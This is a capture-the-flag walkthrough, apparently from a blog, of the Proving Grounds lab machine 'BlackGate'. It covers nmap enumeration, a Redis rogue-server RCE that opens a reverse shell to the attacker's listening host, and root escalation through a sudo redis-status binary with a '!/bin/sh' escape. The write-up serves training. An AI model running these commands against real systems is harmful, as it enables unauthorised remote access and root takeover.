PG - BlackGate

PG – BlackGate

In this walk through, we will be going through the BlackGate room from Proving Grounds. This room is rated as Hard on the platform and it consist of exploitation of redis server RCE exploitation to get an initial shell followed by the exploitation of redis-status binary to get root. So, let’s get started without any delay.

BlackGate

Machine Info:

TitleBlackGate
IPaddress192.168.195.176
DifficultyHard
OSLinux
DescriptionBlackGate is a Hard Linux machine that requires redis server RCE exploitation to get an initial shell followed by the exploitation of redis-status binary to get root.

Enumeration:

  • I started off with a regular nmap aggressive scan and found only two ports opened – 22 (SSH) and 6379 (Redis).

$ sudo nmap -A 192.168.195.176
[sudo] password for wh1terose: 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-18 11:22 IST

Nmap scan report for 192.168.195.176
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.3p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	PRION:CVE-2016-20012	5.0	https://vulners.com/prion/PRION:CVE-2016-20012
|     	PRION:CVE-2021-28041	4.6	https://vulners.com/prion/PRION:CVE-2021-28041
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	PRION:CVE-2020-15778	4.4	https://vulners.com/prion/PRION:CVE-2020-15778
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	PRION:CVE-2020-14145	4.3	https://vulners.com/prion/PRION:CVE-2020-14145
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|     	PRION:CVE-2021-41617	3.5	https://vulners.com/prion/PRION:CVE-2021-41617
|     	PRION:CVE-2021-36368	2.6	https://vulners.com/prion/PRION:CVE-2021-36368
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
53/tcp filtered domain
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=1/18%OT=22%CT=1%CU=39821%PV=Y%DS=4%DC=T%G=Y%TM=65A8BCB
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10B%TI=Z%II=I%TS=A)OPS(O1=M
OS:54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54EST11NW7%O5=M54EST11NW7%
OS:O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%
OS:DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
OS:T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=6E
OS:21%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 21/tcp)
HOP RTT       ADDRESS
1   205.15 ms 192.168.45.1
2   205.11 ms 192.168.45.254
3   205.77 ms 192.168.251.1
4   205.86 ms 192.168.195.176

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.33 seconds

nmap scan

sudo nmap -sS -p- -T5 192.168.195.176

all port scan

  • Enumerated redis with nmap scripts which revealed us the redis version running that was – 4.0.14

sudo nmap --script redis-info,redis-brute -p 6379 192.168.195.176

redis Enumeration

Initial Access:

  • Next, i checked online for any exploits of the concerned version and found out that we can use Redis rogue server script to get a reverse shell back using the redis server.

./redis-rogue-server.py --rhost 192.168.195.176 --lhost 192.168.45.156

Redis Rogue Server exploit

got initial access

  • Captured the local flag.

local flag

Privilege Escalation:

  • Moving on, used Linpeas on the target to enumerate some potential privilege escalation vectors and found our that we can run redis-status binary as root.

sudo -l

Wrong Authorization key

  • Checked for any strings that might be important for us using the string binary reveals a potential authorization key which is required by the redis-status binary.

strings /usr/local/bin/redis-status

Got Authorization key

  • Used the captured Authorization key in the binary and executed the command to spawn a shell once the binary is in halt after the processing which grants me a shell as root.

sudo /usr/local/bin/redis-status

!/bin/sh

redis-status service running

  • Finally captured the root flag to complete the challenge.

root flag

Also Read: PG – Astronaut

Conclusion:

Conclusion

So that was BlackGatefor you. We started off with a regular nmap scan and found only two port opened – 22 (SSH) and 6379 (Redis).. Enumerated the redis service and found out that the version running is 4.0.14. Looked online for any known exploit related to it and found that it is vulnerable to a Redis Rogue Server RCE vulnearbility. Got access using the concerned exploit and performed post-compromise enumeration with Linpeas. Found out a redis-status binary that we can run as sudo, abused it to get root on the system. On that note, i would take your leave and will meet you in next one. Till then, “Happy hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top